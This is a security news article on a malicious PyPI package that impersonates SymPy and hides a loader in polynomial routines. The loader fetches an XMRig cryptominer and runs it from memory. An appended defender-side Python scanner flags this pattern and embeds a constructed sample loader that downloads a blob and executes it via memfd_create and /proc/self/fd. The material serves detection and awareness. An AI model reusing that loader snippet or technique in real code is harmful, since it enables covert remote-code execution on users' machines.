Malicious PyPI Package Impersonates SymPy, Mimicking the Popular Library
Security researchers have discovered a malicious PyPI package that employs typosquatting and lookalike metadata, effectively tricking users into installing a fraudulent version of a legitimate library.
The researchers also noted that the package crossed more than a thousand downloads within its first day online, showing how quickly such threats can spread once they enter a public registry.
Execution Chain: From Polynomial Math to Cryptomining
The most concerning part of this campaign lies in how the malware activates and runs.
Instead of triggering on import, the attacker injected a loader into specific polynomial routines inside the modified SymPy code.
When those math functions are called, the loader quietly contacts remote servers controlled by the attacker, fetches a configuration file, and then downloads a separate Linux binary.
Socket.dev researchers identified the binary as an XMRig-based cryptominer configured to mine cryptocurrency over encrypted Stratum connections.
To reduce traces on disk, the loader uses Linux’s memfd_create system call and executes the payload directly from memory using the /proc/self/fd path.
This in-memory execution pattern helps the malware evade simple file-based scans, while still turning legitimate algebra operations into a covert mining operation in the background.
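As an added, defender-side example that is not part of the HackersRadar write-up or Socket.dev's research: a small AST scan that flags Python functions combining a network fetch with memfd_create and a /proc/self/fd path, the loader shape described above. The indicator names and the sample source embedded in it are constructed for illustration, not taken from the actual package.

```python
"""Static scan for the loader shape the article describes: download data,
write it into a memfd_create() file, execute it via /proc/self/fd.
Added example; indicator names and the sample are constructed."""
import ast

MEMFD_NAMES = {"memfd_create"}
PROC_FD_MARKER = "/proc/self/fd"
NET_MODULES = {"urllib", "requests", "http", "socket"}

def _indicators(func):
    """Indicator tags referenced anywhere inside one function body."""
    hits = set()
    for sub in ast.walk(func):
        if isinstance(sub, ast.Attribute) and sub.attr in MEMFD_NAMES:
            hits.add("memfd_create")          # os.memfd_create(...)
        elif isinstance(sub, ast.Name) and sub.id in MEMFD_NAMES:
            hits.add("memfd_create")          # from os import memfd_create
        elif isinstance(sub, ast.Name) and sub.id in NET_MODULES:
            hits.add("network")               # urllib.request.urlopen(...)
        elif (isinstance(sub, ast.Constant) and isinstance(sub.value, str)
              and PROC_FD_MARKER in sub.value):
            hits.add("proc_self_fd")          # "/proc/self/fd/%d" exec path
    return hits

def scan_source(src, filename="<string>"):
    """One finding per function touching any indicator; 'high' only when
    memfd_create is paired with a download or a /proc/self/fd path."""
    findings = []
    for node in ast.walk(ast.parse(src, filename=filename)):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            hits = _indicators(node)
            if hits:
                high = "memfd_create" in hits and hits & {"network", "proc_self_fd"}
                findings.append({"function": node.name, "line": node.lineno,
                                 "indicators": sorted(hits),
                                 "risk": "high" if high else "review"})
    return findings

# Constructed sample: a benign polynomial helper beside a function shaped
# like the loader in the article; only the second should be flagged.
SAMPLE = '''
import os, urllib.request
def poly_gcd(a, b):
    return a if b == 0 else poly_gcd(b, a % b)
def _stage(cfg_url):
    blob = urllib.request.urlopen(cfg_url).read()
    fd = os.memfd_create("m", 0)
    os.write(fd, blob)
    os.execv("/proc/self/fd/%d" % fd, ["m"])
'''
```

Run scan_source over each .py file of a freshly installed dependency before trusting it; a lone memfd_create hit is rated only "review" because the syscall itself has legitimate uses.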